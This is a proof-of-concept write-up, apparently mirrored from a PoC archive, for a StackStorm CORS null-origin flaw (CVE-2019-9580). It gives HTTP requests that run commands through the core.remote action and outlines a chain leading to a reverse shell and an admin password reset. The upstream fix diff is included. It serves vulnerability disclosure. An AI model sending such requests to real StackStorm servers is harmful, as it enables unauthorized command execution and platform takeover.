Associated Vulnerability
Title:StackStorm 跨站脚本漏洞 (CVE-2019-9580)Description:StackStorm是一套事件驱动的自动化平台。该平台主要用于自动修复、安全响应、故障排除和程序部署等功能。Web UI是其中的一个基于Web的用户图形界面。 StackStorm Web UI 2.9.3之前版本和2.10.3之前的2.10.x版本中的st2web存在安全漏洞。攻击者可利用该漏洞绕过跨域资源共享保护机制。
Description
CVE-2019-9580 - StackStorm: exploiting CORS misconfiguration (null origin) to gain RCE
Readme
# CVE-2019-9580 - StackStorm exploiting CORS null origin to gain RCE < 2.9.3 and 2.10.3
> Prior to 2.10.3/2.9.3, if the origin of the request was unknown, we would return null. null can result in a successful request from an unknown origin in some clients. Allowing the possibility of XSS style attacks against the StackStorm API.
found by [Barak Tawily](https://github.com/Quitten) and [Anna Tsibulskaya](https://github.com/anna-wix)
_(user on Firefox is the victim, user on Chrome is the attacker)_
### Proof of Concept
#### Exploiting null CORS
By sending a request to the StackStorm API with an null Origin header `Origin: null`, the server responds with an `Access-Control-Allow-Origin` to `null`.
```
GET /api/v1/executions?action=packs.get_config&limit=5&exclude_attributes=trigger_instance&parent=null HTTP/1.1
Host: localhost:4443
Origin: 443
Referer: https://localhost:4443/
x-auth-token: a19e39b9dff24e4798ba04c7036d0275
```
Server response:
```
Access-Control-Allow-Origin: null <-- hug hug hug
Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Authorization,X-Auth-Token,St2-Api-Key,X-Request-ID
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: Content-Type,X-Limit,X-Total-Count,X-Request-ID
```
Exploiting null CORS is documented on a [blogpost from portswigger](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) and we can found the following payload:
```javascript
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,
<script>
*inject your malicous code*
</script>’></iframe>
```
#### But what about the RCE ?
StackStorm allows you to configure **actions** and some of them like `core.remote` execute arbitrary command on the host of your choice.
So if we put host **127.0.0.1**, we will execute command on the StackStorm docker. Nice, RCE should be OK since a simple POST request is send to register an **action**.
```
POST /api/v1/executions HTTP/1.1
Host: localhost:4443
Origin: null
Content-Type: application/json
x-auth-token: a19e39b9dff24e4798ba04c7036d0275
Content-Length: 131
{"action":"core.remote","parameters":{"cmd":"touch /tmp/pwn2.txt","hosts":"127.0.0.1","cwd":"/tmp"},"context":{"trace_context":{}}}
```
#### What next ?
We can execute command on the host of StackStorm okay, but let's gain full control over StackStorm plateform. This can be down by reseting the password of the administrator. Using the documention:
> Need to change the password? Run: sudo htpasswd /etc/st2/htpasswd st2admin.
https://docs.stackstorm.com/authentication.html
Nice, let's just put all together :
1. Send a link to the victim with malicous payload that register a new **action** on the host 127.0.0.1 to exec an arbirary command
2. The victim clicks on the link and view the pony
3. Since CORS is null when a request is sent with header `Origin: null`, the POST request to register the new action is working (we also set the parameter `credentials: "include"`)
4. The action is trigger and command executed (reverse shell)
5. Attacker resets the password of the administrator and gain full control over StackStorm platform
6. Attacker can corrupt all the other host registered into StackStorm
**Security Advisory**:
- https://stackstorm.com/2019/03/08/stackstorm-2-9-3-2-10-3/
- https://github.com/StackStorm/st2/pull/4577/commits/66605b7b202b8bd2db1ccd8c1ce7279028ac86d4
```diff
From 66605b7b202b8bd2db1ccd8c1ce7279028ac86d4 Mon Sep 17 00:00:00 2001
From: bigmstone <matthew99@gmail.com>
Date: Tue, 5 Mar 2019 12:22:26 -0600
Subject: [PATCH] Fix improper CORS return
Prior to this commit if you sent a request from an origin not listed in
`allowed_origins` we would respond with `null` for the
`Access-Control-Allow-Origin` header. Per
[https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin#Directives](mozilla's documentation)
null should not be used as some clients will allow the request to go
through. This commit returns the first of our allowed origins if the
requesting origin is not a supported origin.
---
st2api/tests/unit/controllers/v1/test_base.py | 4 ++--
st2common/st2common/middleware/cors.py | 2 +-
2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/st2api/tests/unit/controllers/v1/test_base.py b/st2api/tests/unit/controllers/v1/test_base.py
index 2a753f22ea..e66148a0a5 100644
--- a/st2api/tests/unit/controllers/v1/test_base.py
+++ b/st2api/tests/unit/controllers/v1/test_base.py
@@ -51,8 +51,8 @@ def test_wrong_origin(self):
'origin': 'http://xss'
})
self.assertEqual(response.status_int, 200)
- self.assertEqual(response.headers['Access-Control-Allow-Origin'],
- 'null')
+ self.assertEqual(response.headers.get('Access-Control-Allow-Origin'),
+ 'http://127.0.0.1:3000')
def test_wildcard_origin(self):
try:
diff --git a/st2common/st2common/middleware/cors.py b/st2common/st2common/middleware/cors.py
index 5781b1a6e7..8cb407b52c 100644
--- a/st2common/st2common/middleware/cors.py
+++ b/st2common/st2common/middleware/cors.py
@@ -66,7 +66,7 @@ def custom_start_response(status, headers, exc_info=None):
origin_allowed = origin
else:
# See http://www.w3.org/TR/cors/#access-control-allow-origin-response-header
- origin_allowed = origin if origin in origins else 'null'
+ origin_allowed = origin if origin in origins else list(origins)[0]
else:
origin_allowed = list(origins)[0]
```
### Ressources:
* https://stackstorm.com/2019/03/08/stackstorm-2-9-3-2-10-3/
* https://quitten.github.io/StackStorm/
File Snapshot
[4.0K] /data/pocs/d7e3dfbb8cf6ecceb3aa581a1cf607734301c0d1
├── [1.9K] index.html
└── [6.0K] README.md
0 directories, 2 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.